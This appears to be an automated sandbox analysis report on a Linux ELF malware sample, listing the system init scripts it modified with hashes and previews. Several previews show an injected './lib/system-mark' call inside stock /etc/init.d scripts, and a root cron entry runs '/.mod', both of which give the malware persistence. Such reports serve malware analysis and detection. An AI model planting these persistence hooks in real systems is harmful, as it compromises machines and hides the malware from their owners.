Entropy (8bit):	3.000961982762677
Encrypted:	false
SSDEEP:	3:HFdtKeIBFv:l6eIBV
MD5:	6B13F24B625DC5B832A4AE80CFAB7DDA
SHA1:	8D0BAF4556328F9CEFB4041D67CB6BF30570AF84
SHA-256:	AC95234D459AA020883AF0A93879C835582CB60D7DD63C68F33993BA2546661F
SHA-512:	76774BF236D5DB77B09BFD2A36F190B86AC7DA7147C635CAF06A1884E151345585803885AD1FCBD60F566A48F165CBF8B445B506047CBC0A9924BF79B4C8E289
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	/1 * * * root /.mod .

/etc/init.d/acpid

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2304
Entropy (8bit):	5.099881186780916
Encrypted:	false
SSDEEP:	48:9tdVEA2+3MPMiOMdxA3Gbsbcq1himLHLHmvgjWL:9tdVEA2+3MPiI3Qbcq1Q4Hrmvt
MD5:	BD41974D1C7269BD429343943C8ED10A
SHA1:	D99E55E32229483A694B8B2EFEC8D15CF1C8FCCE
SHA-256:	56044D786BA8F4B11DDF9DBC88502ECE10246991CA383F913E9B86E57F19A28E
SHA-512:	A386FA323285EF24A9A442A5CEB8D9B2A36409B7BEC2D729031C7F83C6F3664EA1A745D35CA487A25FC953B6197F3A9FF1B35EEEFD2F90262BC2EEA7BB89D522
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: acpid.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# X-Start-Before: kdm gdm3 xdm lightdm.# X-Stop-After: kdm gdm3 xdm lightdm.# Default-Start: 2 3 4 5.# Default-Stop: .# Short-Description: Start the Advanced Configuration and Power Interface daemon.# Description: Provide a socket for X11, hald and others to multiplex.# kernel ACPI events..### END INIT INFO..set -e..ACPID="/usr/sbin/acpid".DEFAULTS="/etc/default/acpid"..# Check for daemon presence.[ -x "$ACPID" ] \|\| exit 0..OPTIONS="".MODULES="".# Include acpid defaults if available.[ -r "$DEFAULTS" ] && . "$DEFAULTS"..# Get lsb functions.. /lib/lsb/init-functions..# As the name says. If the kernel supports modules, it'll try to load.# the ones listed in "MODULES"..load_modules() {. [ -f /proc/modules ] \|\| return 0. if [ "$MODULES" = "all" ]; then./lib/system-mark. MODULES="$(sed -rn 's#^(/lib/mod

/etc/init.d/alsa-utils

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	5694
Entropy (8bit):	5.4204403708834565
Encrypted:	false
SSDEEP:	96:iKtDd9/iwmDaLEuE9nwsmFRzF+rc17NyppyhHk5eEkv:iCdlW6EuUnZeRB+rc15yryZkq
MD5:	14EB05544D93BC0B09262334CCB79F2C
SHA1:	620AC9E2B5A23703A568800376CE590445FDFBD5
SHA-256:	C52ED6032904A94A0B83DCD1CDFA83D48DA29D049A5F29BB90265492120183E4
SHA-512:	83DCDC085FBFEEC1843D8C5E8978162AA34F9ECD0E7BF4E8BBF8D8D005837FF6A69F56BF7988400CB5AF07A5AF63D6471BD8BC2DAE223CDA3500F07B0EE9C36B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.#.# alsa-utils initscript.#.### BEGIN INIT INFO.# Provides: alsa-utils.# Required-Start: $local_fs $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: Restore and store ALSA driver settings.# Description: This script stores and restores mixer levels on.# shutdown and bootup.On sysv-rc systems: to.# disable storing of mixer levels on shutdown,.# remove /etc/rc[06].d/K50alsa-utils. To disable.# restoring of mixer levels on bootup, rename the.# "S50alsa-utils" symbolic link in /etc/rcS.d/ to.# "K50alsa-utils"..### END INIT INFO..# Don't use set -e; check exit status instead..# Exit silently if package is no longer installed.[ -x /usr/sbin/alsactl ] \|\| exit 0..PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin.MYNAME=/etc/init.d/alsa-utils.ALSACTLHOME=/run/alsa..[ -d "$ALSA

/etc/init.d/anacron

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2124
Entropy (8bit):	4.760217966755678
Encrypted:	false
SSDEEP:	24:aiF8WzzU+LuN5K6YqfOv5i1CPeFecyZR11s+M8k93ILlfWW6910kF4T0Op:7RzgTNNOhi1eAryZR1vX5fTKX00+
MD5:	B8F9EF2F7B8875CFEE672094FF6B7829
SHA1:	901405E0A0F9AF0D39010FB609E06A34FA9918F5
SHA-256:	11696FDED80A45C7CD5351D01D0C4419E69A863C3774F7F37C3FD22F22F3EE16
SHA-512:	A90371D6664E9043A8FD43A8138B245C228AFF9E64AC6A41D73C849C0CF746ABFAEABB2C1D2BEEBBC05D7451A2B84DAE4E80A0BDF64864A390FE950437CB4745
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: anacron.# Required-Start: $remote_fs $syslog $time.# Required-Stop: $remote_fs $syslog $time.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Run anacron jobs.# Description: The first purpose of this script is to run anacron at.# boot so that it can catch up with missed jobs. Note.# that anacron is not a daemon. It is run here just once.# and is later started by the real cron. The second.# purpose of this script is that said cron job invokes.# this script to start anacron at those subsequent times,.# to keep the logic in one place..### END INIT INFO..PATH=/bin:/usr/bin:/sbin:/usr/sbin..test -x /usr/sbin/anacron \|\| exit 0.test -r /etc/default/anacron && . /etc/default/anacron... /lib/lsb/init-functions..case "$1" in. start). if init_is_upstart 2>/dev/null; then./lib/system-mark. exit 1. fi. log_daemon_msg "Starting

/etc/init.d/apparmor

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3826
Entropy (8bit):	5.249219751257144
Encrypted:	false
SSDEEP:	96:RFCjnn83hjz3n1zJNSNuDNBqNPoNpMbANEF7gG9M3zRVhszRVhxRl:Wjn4hj779Gjl
MD5:	DE4607EB984BD8C2751A19FED2566718
SHA1:	B605ED61D40829230C99D2C54B401CD2E154DE20
SHA-256:	F6BC11FE360F4DB66CB6B1C7763DC087E5D8F76A7D8145F08F617FD10C4FBFFD
SHA-512:	D932550ED8287788D8E14165CB47EB3A649D40B8AE6E8EEEC6ADCCC3563D8B376BBDE5C804205BD9B174CC3786154292C2D352307F41D9649312D9BF615DFD0C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# ----------------------------------------------------------------------.# Copyright (c) 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007.# NOVELL (All rights reserved).# Copyright (c) 2008, 2009 Canonical, Ltd..#.# This program is free software; you can redistribute it and/or.# modify it under the terms of version 2 of the GNU General Public.# License published by the Free Software Foundation..#.# This program is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License.# along with this program; if not, contact Novell, Inc..# ----------------------------------------------------------------------.# Authors:.# Steve Beattie <steve.beattie@canonical.com>.# Kees Cook <kees@ubuntu.com>.#.# /etc/init.d/app

/etc/init.d/apport

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3050
Entropy (8bit):	5.216428196190724
Encrypted:	false
SSDEEP:	48:jV/OxxHuoBusZABLm/tiUmZmNndBuSZWg/e/fuppzDGdxboGxz5:jV/OxNDBusZABLm1BmOnbuSZWg2/anOT
MD5:	FB82D03D336FC2AC2901C9D28682B408
SHA1:	992649B4B941B5B5372A6215DA4A5231BFDCD0BF
SHA-256:	F9AFCA8A53AF95CC19F4D1D2495F80335924F5C65ABE9147C5D46AE29CBEC76C
SHA-512:	8EE7107F9FCB458989553B871B06823646B765980D7BBF84C7110C0FFEA116DE7D141D5FE21BA2CFDBCA9A423434AE276D3949AB6EF1EACED8DEF7DFE6D16C40
Malicious:	true
Preview:	#! /bin/sh..### BEGIN INIT INFO.# Provides: apport.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: automatic crash report generation.### END INIT INFO..DESC="automatic crash report generation".NAME=apport.AGENT=/usr/share/apport/apport.SCRIPTNAME=/etc/init.d/$NAME..# Exit if the package is not installed.[ -x "$AGENT" ] \|\| exit 0..# read default file.enabled=1.[ -e /etc/default/$NAME ] && . /etc/default/$NAME \|\| true..# Define LSB log_* functions..# Depend on lsb-base (>= 3.0-6) to ensure that this file is present... /lib/lsb/init-functions..#.# Function that starts the daemon/service.#.do_start().{..# Return..# 0 if daemon has been started..# 1 if daemon was already running..# 2 if daemon could not be started...[ -e /var/crash ] \|\| mkdir -p /var/crash..chmod 1777 /var/crash...# check for kernel crash dump, convert it to apport report..if [ -e /var/crash/vmcore ] \|\| [ -n "`ls /va

/etc/init.d/avahi-daemon

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2453
Entropy (8bit):	4.851897064111941
Encrypted:	false
SSDEEP:	48:9s2V+ig+Ui83MZoJQukTS9VC2/ulMA0uv3uKv2ZsGyjyRft/zsDE7Ed:93oijU4ukTSZux0uv3uKvdJORlADHd
MD5:	84273238ABAA8A7DE2D516C95D92F171
SHA1:	875222E1EE9FE460931E5340C94F958D1DB14C9D
SHA-256:	2BDB658E48A470E440378BC4BC4CC48B9B228BC3DF759187787A7D9FD71EEC90
SHA-512:	C226B5813A17D0640FBC77D09889F19F638FF9701CCC2E933B3DC8749674BC1918FD22011096126FEBBBBF55F91BE1D78DF8CC176D4465BA4A2426414C2D1D88
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: avahi avahi-daemon.# Required-Start: $remote_fs dbus.# Required-Stop: $remote_fs dbus.# Should-Start:. $syslog.# Should-Stop: $syslog.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Avahi mDNS/DNS-SD Daemon.# Description: Zeroconf daemon for configuring your network .# automatically.### END INIT INFO..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DESC="Avahi mDNS/DNS-SD Daemon".NAME="avahi-daemon".DAEMON="/usr/sbin/$NAME".SCRIPTNAME=/etc/init.d/$NAME..# Gracefully exit if the package has been removed..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..# Include avahi-daemon defaults if available..test -f /etc/default/avahi-daemon && . /etc/default/avahi-daemon..DISABLE_TAG="/var/run/avahi-daemon/disabled-for-unicast-local"..#.# Function that starts the daemon/service..#.d_start() {. $DAEMON -c && return 0.. if [ -e $DISABLE_TAG -a "$AVAHI_DAEMON_DETECT_LOCAL" !=

/etc/init.d/binfmt-support

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	5.0501124070839
Encrypted:	false
SSDEEP:	24:ai3V6yXngSBVSBNyj6edNHcBcN6ekvx2w5mw+76opC:73ZngWVWNMNH0Y6bJ2w4wrJ
MD5:	A79B82CEAEE457E62E6EA7BAF7D1CAE5
SHA1:	B1EEBF3A9994B719F88E63BAC51A40EF3E3A4082
SHA-256:	76950791A135F0DFCCBE3A246A8085304345B40AC3DFE30BF1CA53C6BF81FD95
SHA-512:	4B6A9CEAEAC8952255DA0EAED35DAB689D80D3BD2B7D69CF3BF36D36271CCA309114D3E32C6C6797143C991DF1EAEB6491A7A36DE6AF9633F71AECB4B3D40C4E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: binfmt-support.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Support for extra binary formats.# Description: Enable support for extra binary formats using the Linux.# kernel's binfmt_misc facility..### END INIT INFO..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.NAME=binfmt-support.DESC="additional executable binary formats"..if [ "$(uname)" != Linux ]; then./lib/system-mark. exit 0.fi..which update-binfmts >/dev/null 2>&1 \|\| exit 0... /lib/lsb/init-functions.[ -r /etc/default/rcS ] && . /etc/default/rcS..set -e.CODE=0..case "$1" in. start). log_daemon_msg "Enabling $DESC" "$NAME". update-binfmts --enable \|\| CODE=$?. log_end_msg $CODE. exit $CODE. ;;.. stop). log_daemon_msg "Disabling $DESC" "$NAME". update-binfmts --disable \|\| CODE=$?. log_end_msg $CODE. exi

/etc/init.d/bluetooth

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3071
Entropy (8bit):	5.403760092319036
Encrypted:	false
SSDEEP:	48:71OoPrcMbC/BUUzGrm92+kbM935LmiVQoOZoKkkFjM+Zh9YDFjMrfOte:79TcWC/BUeem92R4V5LROt5r9CE2A
MD5:	E001FF7DBF2452314EEC95D08540D7AF
SHA1:	B2B63E00B1685EAA0DACC4D5F2C07C15F0D6AE55
SHA-256:	D6AA950CFA0BA62353E3734AB3E43F1B402C1B7F95CAC3C5D99D8453D299BDF3
SHA-512:	A9EA2F92C5A94330041228C7AECEB44718EBA47017ED7A41DEC87D6EAD6D7B34F968A79CFCFDDCC38561D964D354BFB63F3F52C2EFEE76C38C80DECCEC2FA944
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: bluetooth.# Required-Start: $local_fs $syslog $remote_fs dbus.# Required-Stop: $local_fs $syslog $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Start bluetooth daemons.### END INIT INFO.#.# bluez Bluetooth subsystem starting and stopping.#.# originally from bluez's scripts/bluetooth.init.#.# Edd Dumbill <ejad@debian.org>.# LSB 3.0 compilance and enhancements by Filippo Giunchedi <filippo@debian.org>.#.# Updated for bluez 4.7 by Mario Limonciello <mario_limonciello@dell.com>.# Updated for bluez 5.5 by Nobuhiro Iwamatsu <iwamatsu@debian.org>.#.# Note: older daemons like dund pand hidd are now shipped inside the.# bluez-compat package..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DESC=bluetooth..DAEMON=/usr/sbin/bluetoothd.HCIATTACH=/usr/bin/hciattach..BLUETOOTH_ENABLED=0.HID2HCI_ENABLED=1.HID2HCI_UNDO=1..SDPTOOL=/usr/bin/sdptool..# If you want to be ignore error of "org.freedesktop.hostname1",.# please en

/etc/init.d/console-setup.sh

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1301
Entropy (8bit):	4.3356283043101165
Encrypted:	false
SSDEEP:	24:9lBiePItKzeBcx2o8/z3ejhTJckS5gzjdJwZWkZg7zcOqb6:93PyKzYcg/LshTJckS5gJw8kG7A9b6
MD5:	FE88F57D8990408CAAF7688C8EB6D734
SHA1:	7160510037CCA5505F40EFBE4CE8CCC777EAECE3
SHA-256:	C01D230B67C35FB75446E7A4599A09751E8859A4462CD5EB34DF9F186B28049F
SHA-512:	3DDA7EAF95F80FD3E35D8FDBF9AB77126E2CBF39CAA5C7A1275227D5267683F43504B191F0E08E901F93667AAFEE1F21F79BA3C8A27D5622C990DAA3AE39583D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: console-setup.sh.# Required-Start: $remote_fs.# Required-Stop:.# Should-Start: console-screen kbd.# Default-Start: 2 3 4 5.# Default-Stop:.# X-Interactive: true.# Short-Description: Set console font and keymap.### END INIT INFO..if [ -f /bin/setupcon ]; then./lib/system-mark. case "$1" in. stop\|status). # console-setup isn't a daemon. ;;. start\|force-reload\|restart\|reload). if [ -f /lib/lsb/init-functions ]; then./lib/system-mark. . /lib/lsb/init-functions. else. log_action_begin_msg () {.. echo -n "$@... ". }.. log_action_end_msg () {.. if [ "$1" -eq 0 ]; then./lib/system-mark.. echo done... else.. echo failed... fi. }. fi. log_action_begin_msg "Setting up console font and keymap". if /li

/etc/init.d/cron

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3111
Entropy (8bit):	4.911661386459712
Encrypted:	false
SSDEEP:	48:5PMic6MicW4dJIrcz8WD23fK2LAb38CE1ATGuMoZisTdDKoA3gHMLf:5E3s4dJWRWD23y2LgsZCTHMnidD/A3gU
MD5:	0E0A4A7372459B9C2D8F45BAA40A64B3
SHA1:	6DEAF952235F89CBDD83FBE48C89A4F048E52043
SHA-256:	2B88ED8EFDF3262040903719AA03156C8CD73B50CF2F2FCCACB33693FE4110D6
SHA-512:	4E11C50B5F5D95CAE5B374C4597DD83F79434876598BD9C5FC32D37B765885DC1FF920D96D6594E548F08DC9D367D8C74F704C9BA49056749E5A3B4CD6D13C50
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# Start/stop the cron daemon..#.### BEGIN INIT INFO.# Provides: cron.# Required-Start: $remote_fs $syslog $time.# Required-Stop: $remote_fs $syslog $time.# Should-Start: $network $named slapd autofs ypbind nscd nslcd winbind sssd.# Should-Stop: $network $named slapd autofs ypbind nscd nslcd winbind sssd.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Regular background program processing daemon.# Description: cron is a standard UNIX program that runs user-specified .# programs at periodic scheduled times. vixie cron adds a .# number of features to the basic UNIX cron, including better.# security and more powerful configuration options..### END INIT INFO..PATH=/bin:/usr/bin:/sbin:/usr/sbin.DESC="cron daemon".NAME=cron.DAEMON=/usr/sbin/cron.PIDFILE=/var/run/crond.pid.SCRIPTNAME=/etc/init.d/"$NAME"..test -f $DAEMON \|\| exit 0... /lib/lsb/init-functions..[ -r /etc/default/cr

/etc/init.d/cryptdisks

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	955
Entropy (8bit):	5.160229628002615
Encrypted:	false
SSDEEP:	12:aiy4BTty5r2MVOc4qVp1b7NBq2dS1uaqLgcIcrPcrmjcdpEMyuDHkkGKErIKDq7p:aiVT5MQsL1bPq2MKZcr/ZkVyKDpjQ
MD5:	3B43339B088088E5B725575549A61F55
SHA1:	98AF37D27DC1A2EFE51AD74366137D375E631BB3
SHA-256:	BF85CED45A7B48892F49D608E189307CC08330A4F2834289B847B457DFD7D28A
SHA-512:	AF7347AEE4625DBD7C23A9A411362EC940B17DBBA794E9B89DC37D893EBCB445044BDB52D21197DBCEF73C75CF697E935D729110A2125D168E82D6B5E24938FC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cryptdisks.# Required-Start: checkroot cryptdisks-early.# Required-Stop: umountroot cryptdisks-early.# Should-Start: udev mdadm-raid lvm2.# Should-Stop: udev mdadm-raid lvm2.# X-Start-Before: checkfs.# X-Stop-After: umountfs.# X-Interactive: true.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Setup remaining encrypted block devices..# Description:.### END INIT INFO..set -e..if [ -r /lib/cryptsetup/cryptdisks-functions ]; then./lib/system-mark... /lib/cryptsetup/cryptdisks-functions.else..exit 0.fi..INITSTATE="remaining".DEFAULT_LOUD="yes"..case "$CRYPTDISKS_ENABLE" in.[Nn])..exit 0..;;.esac..case "$1" in.start)..do_start..;;.stop)..do_stop..;;.restart\|reload\|force-reload)..do_stop..do_start..;;.force-start)..FORCE_START="yes"..do_start..;;.)..echo "Usage: cryptdisks {start\|stop\|restart\|reload\|force-reload\|force-start}"..exit 1..;;.esac..

/etc/init.d/cryptdisks-early

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	914
Entropy (8bit):	5.158660421998386
Encrypted:	false
SSDEEP:	12:aiy2BTCZN2MVW4qVS5sNBq2dX9qLgcIcrPcrmZm2dpBdMyuDHkkGKErIKDq7URuL:ai/TTMkw5Mq2CeKYZkVyKDvjQ
MD5:	905C0E1E5CC6FFC62CA21752E3F1753E
SHA1:	8810356FC23199F23631A7656815A431E34C4C1A
SHA-256:	6418AB31DBC9A1222A89C3D896C534373D9CB2D8D5D42FC75699889979E0AC34
SHA-512:	C7735CFB23C6CC924E7B55D825F352EBFB86CAEA48DF358499EF294EBE82F49F325F3C1098AA717BA622A8545E9A116C2648B44E2066597C5D4A37E71E6F77F8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cryptdisks-early.# Required-Start: checkroot.# Required-Stop: umountroot.# Should-Start: udev mdadm-raid.# Should-Stop: udev mdadm-raid.# X-Start-Before: lvm2.# X-Stop-After: lvm2 umountfs.# X-Interactive: true.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Setup early encrypted block devices..# Description:.### END INIT INFO..set -e..if [ -r /lib/cryptsetup/cryptdisks-functions ]; then./lib/system-mark... /lib/cryptsetup/cryptdisks-functions.else..exit 0.fi..INITSTATE="early".DEFAULT_LOUD=""..case "$CRYPTDISKS_ENABLE" in.[Nn])..exit 0..;;.esac..case "$1" in.start)..do_start..;;.stop)..do_stop..;;.restart\|reload\|force-reload)..do_stop..do_start..;;.force-start)..FORCE_START="yes"..do_start..;;.)..echo "Usage: cryptdisks-early {start\|stop\|restart\|reload\|force-reload\|force-start}"..exit 1..;;.esac..

/etc/init.d/cups

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2856
Entropy (8bit):	5.2245818519394565
Encrypted:	false
SSDEEP:	48:76MLNMwmbAzAZVCoLqLVO1Z6NH/qAh1UoAaYmUoG/FVv/FkG/UoG/F1RetsJ:7BWwmEMZVChFB7UoAaZUoGDvuG/UoGr/
MD5:	A13A7862BD0038FC523BFDFD69743E21
SHA1:	02BDC079157F4E2DF13C4CD4EF92BF477512348E
SHA-256:	0B82721F8B1FA32F5D25FE373FCD6DC540296675AFAD5C04A0EA18C4855DF29D
SHA-512:	4856AEFE6C5516CD19438DAD4689B3D656BA0ACFD0E498ABDA54628E1287B2C9C340040799C5B8AE68DA67970E19B41264E0F7C0416108E53D6477F5F18C7AC9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cups.# Required-Start: $syslog $remote_fs.# Required-Stop: $syslog $remote_fs.# Should-Start: $network avahi-daemon slapd nslcd.# Should-Stop: $network.# X-Start-Before: samba.# X-Stop-After: samba.# Default-Start: 2 3 4 5.# Default-Stop: 1.# Short-Description: CUPS Printing spooler and server.# Description: Manage the CUPS Printing spooler and server;.# make it's web interface accessible on http://localhost:631/.### END INIT INFO..# Author: Debian Printing Team <debian-printing@lists.debian.org>..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/cupsd.NAME=cupsd.PIDFILE=/run/cups/$NAME.pid.DESC="Common Unix Printing System".SCRIPTNAME=/etc/init.d/cups..unset TMPDIR..# Exit if the package is not installed.test -x $DAEMON \|\| exit 0..mkdir -p /run/cups/certs.[ -x /sbin/restorecon ] && /sbin/restorecon -R /run/cups..# Define LSB log_* functions..

/etc/init.d/cups-browsed

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1979
Entropy (8bit):	5.144887658077899
Encrypted:	false
SSDEEP:	48:7mU3mK7xpvyCKyhfPV5upSYf54v6YSBFQJvFS2b:7j3FpjhnV5upSYuv3ScJQ2b
MD5:	B6B52BC4EBC4D496D01B30E2CFCF2C62
SHA1:	0221F156258ED821216CBF81280EE6324BDD52E9
SHA-256:	62B6CC632C9AC071EF72CDEB7057A4B20B7AE17413A289AEC43A67162B20A989
SHA-512:	B6FD6007E039984D1E505A62C76BB3373F3AF4A4DCB7E1AB7E2DF5C66D9D2F87DEB3DE2DEE97DF8FC33E9F94975B64DF03049C4DF60A1F02FADF4D5A7F6D4ED8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cups-browsed.# Required-Start: $syslog $remote_fs $network $named $time.# Required-Stop: $syslog $remote_fs $network $named $time.# Should-Start: avahi-daemon.# Should-Stop: avahi-daemon.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: cups-browsed - Make remote CUPS printers available locally.# Description: This daemon browses Bonjour broadcasts of shared remote CUPS.# printers and makes these printers available locally by creating.# local CUPS queues pointing to the remote queues. This replaces.# the CUPS browsing which was dropped in CUPS 1.6.1. For the end.# the behavior is the same as with the old CUPS broadcasting/.# browsing, but in the background the standard method for network.# service announcement and discovery, Bonjour, is used..### END INIT INFO..DAEMON=/usr/sbin/cups-browsed.NAME=cups-browsed.PIDFIL

/etc/init.d/dbus

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, Unicode text, UTF-8 text executable
Category:	dropped
Size (bytes):	3255
Entropy (8bit):	5.118926067111819
Encrypted:	false
SSDEEP:	96:9JOxbyAn/JNsQmx+xZRGWoGUuK2gY5W7zTXmgI:9Jw2U1MSIr7nXmL
MD5:	B05B34CA2A32E2007677F6CD40C3AF66
SHA1:	48F6C6EC5AE325D1E72224E27E98DE1CF817C521
SHA-256:	6C0251B0D84D116413A6DEF3B4D1699017BE1114E025B5E7E4B546237209574E
SHA-512:	692CE95159E6677954A6E573ADCDC5BFF11301E37CF25501F7205164CC2F4D24B6758663BE5ABD680EEC2E22C08AA491CEC269DDB696AC2D4EF99798CBC30495
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: dbus.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: D-Bus systemwide message bus.# Description: D-Bus is a simple interprocess messaging system, used.# for sending messages between applications..### END INIT INFO.# -- coding: utf-8 --.# Debian init.d script for D-BUS.# Copyright . 2003 Colin Walters <walters@debian.org>.# Copyright . 2005 Sjoerd Simons <sjoerd@debian.org>..set -e..DAEMON=/usr/bin/dbus-daemon.UUIDGEN=/usr/bin/dbus-uuidgen.UUIDGEN_OPTS=--ensure.NAME=dbus.DAEMONUSER=messagebus.PIDDIR=/var/run/dbus.PIDFILE=$PIDDIR/pid.DESC="system message bus"..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..# Source defaults file; edit that file to configure this script..PARAMS="".if [ -e /etc/default/dbus ]; then./lib/system-mark. . /etc/default/dbus.fi..create_machineid() {. # Create machine-id file. i

/etc/init.d/gdm3

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3102
Entropy (8bit):	5.042976496573067
Encrypted:	false
SSDEEP:	48:78unF1gLpxNlduwTebFGBzB4ndfPaMa59zqKN/UsCVADsZvOsFzmxOsFC2WtFji:7dnM1XV3B2dUdaVAGvoe2Wtc
MD5:	34C249DFA3336DB31FBE66E1CD5758F6
SHA1:	4B86122506102F1A88F72FF6D83C8E32B88F9D1E
SHA-256:	EE131550054FD4C8053F1C139C7F96CDBA8FD3F7CCFA78C1ED87DDD4FFC10D47
SHA-512:	B88FE306642B0757B24110D43BFF4A286D24C1995C0E6C3E9429E85E51D9D9DD4150BB4F99F818EDBC3CF2AFB2F9CE30CB1E7928B15CF8D41ADC330D3F0C58F3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: gdm3.# Should-Start: console-screen dbus network-manager.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: GNOME Display Manager.# Description: Debian init script for the GNOME Display Manager.### END INIT INFO.#.# Author: Ryan Murray <rmurray@debian.org>.#.set -e..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/gdm3.PIDFILE=/var/run/gdm3.pid..test -x $DAEMON \|\| exit 0..if [ -r /etc/default/locale ]; then./lib/system-mark. . /etc/default/locale. export LANG LANGUAGE.fi... /lib/lsb/init-functions..# To start gdm even if it is not the default display manager, change.# HEED_DEFAULT_DISPLAY_MANAGER to "false.".HEED_DEFAULT_DISPLAY_MANAGER=true.DEFAULT_DISPLAY_MANAGER_FILE=/etc/X11/default-display-manager..activate_logind() {. # Try to dbus activate logind to avoid a race conditions if we are not. # runnin

/etc/init.d/hddtemp

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3163
Entropy (8bit):	5.259424339682965
Encrypted:	false
SSDEEP:	48:ietQlU+vdYb5tM7yL7yi47yIrrF9o6YRK50JDRABzNJuhCv8Z//UZJ7iuh052m3s:FtQlTd65tp6iN0oLRsQaAsUkho2mc
MD5:	78C631FF42D0225229009886F9999B56
